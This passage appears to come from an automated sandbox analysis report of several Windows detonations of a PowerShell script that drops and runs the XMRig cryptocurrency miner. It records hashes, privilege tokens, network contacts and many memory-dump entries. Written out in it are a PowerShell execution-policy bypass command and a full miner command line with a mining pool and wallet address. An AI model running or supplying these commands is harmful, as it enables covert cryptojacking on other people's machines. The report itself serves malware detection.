memory/2276-50-0x000002940ACC0000-0x000002940ACE0000-memory.dmp

memory/5000-52-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp

memory/2276-53-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-54-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-57-0x000002940ACE0000-0x000002940AD00000-memory.dmp

memory/2276-56-0x000002940ACC0000-0x000002940ACE0000-memory.dmp

memory/2276-55-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-58-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-59-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-60-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-61-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-62-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-63-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-64-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-65-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-66-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-67-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-68-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-69-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-70-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-71-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-72-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-73-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-74-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-75-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-76-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-77-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-78-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-79-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-80-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-81-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-82-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-83-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-84-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-85-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-86-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-87-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-88-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-89-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-90-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-91-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-92-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-93-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-94-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-95-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-96-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-97-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-98-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-99-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-100-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-101-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-102-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-103-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-104-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-105-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-106-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-107-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-108-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-109-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-110-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-111-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-112-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-113-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-114-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-115-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

memory/2276-116-0x00007FF68CB20000-0x00007FF68D753000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000002549E620000-0x000002549E642000-memory.dmp

memory/4988-6-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-9-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-10-0x000002549E7D0000-0x000002549E846000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qckj1yop.a54.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x000002549E7B0000-0x000002549E7C2000-memory.dmp

memory/4988-61-0x000002549E790000-0x000002549E79A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4776-90-0x000001C5DF6D0000-0x000001C5DF6F0000-memory.dmp

memory/4776-91-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4988-92-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4776-93-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4776-96-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-97-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-98-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-99-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-100-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-101-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-102-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-103-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-104-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-105-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-106-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-107-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-108-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-109-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-110-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-111-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-112-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-113-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-114-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-115-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-116-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-117-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-118-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-119-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-120-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-121-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-122-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-123-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-124-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-125-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-126-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-127-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-128-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-129-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-130-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-131-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-132-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-133-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-134-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-135-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-136-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-137-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-138-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-139-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-140-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-141-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-142-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-143-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-144-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-145-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-146-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-147-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-148-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-149-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-150-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-151-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-152-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-153-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-154-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-155-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

memory/4776-156-0x00007FF79BEE0000-0x00007FF79CB13000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 52.111.243.31:443 tcp

Files

memory/4132-0-0x00007FFDA2C73000-0x00007FFDA2C75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0ww0mai.x1s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4132-9-0x00000197A04B0000-0x00000197A04D2000-memory.dmp

memory/4132-10-0x00007FFDA2C70000-0x00007FFDA3732000-memory.dmp

memory/4132-11-0x00007FFDA2C70000-0x00007FFDA3732000-memory.dmp

memory/4132-12-0x00007FFDA2C70000-0x00007FFDA3732000-memory.dmp

memory/4132-14-0x00000197A0690000-0x00000197A06A2000-memory.dmp

memory/4132-15-0x00000197A0670000-0x00000197A067A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3940-46-0x000002260B660000-0x000002260B680000-memory.dmp

memory/3940-47-0x000002260B8F0000-0x000002260B910000-memory.dmp

memory/3940-48-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/4132-50-0x00007FFDA2C73000-0x00007FFDA2C75000-memory.dmp

memory/3940-49-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-53-0x000002260D0E0000-0x000002260D100000-memory.dmp

memory/3940-52-0x000002260B910000-0x000002260B930000-memory.dmp

memory/4132-51-0x00007FFDA2C70000-0x00007FFDA3732000-memory.dmp

memory/3940-54-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-55-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-57-0x000002260D0E0000-0x000002260D100000-memory.dmp

memory/3940-56-0x000002260B910000-0x000002260B930000-memory.dmp

memory/3940-58-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-59-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-60-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-61-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-62-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-63-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-64-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-65-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-66-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-67-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-68-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-69-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-70-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-71-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-72-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-73-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-74-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-75-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-76-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-77-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-78-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-79-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-80-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-81-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-82-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-83-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-84-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-85-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-86-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-87-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-88-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-89-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-90-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-91-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-92-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-93-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-94-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-95-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-96-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-97-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-98-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-99-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-100-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-101-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-102-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-103-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-104-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-105-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-106-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-107-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-108-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-109-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-110-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-111-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-112-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-113-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-114-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-115-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

memory/3940-116-0x00007FF6B7710000-0x00007FF6B8343000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
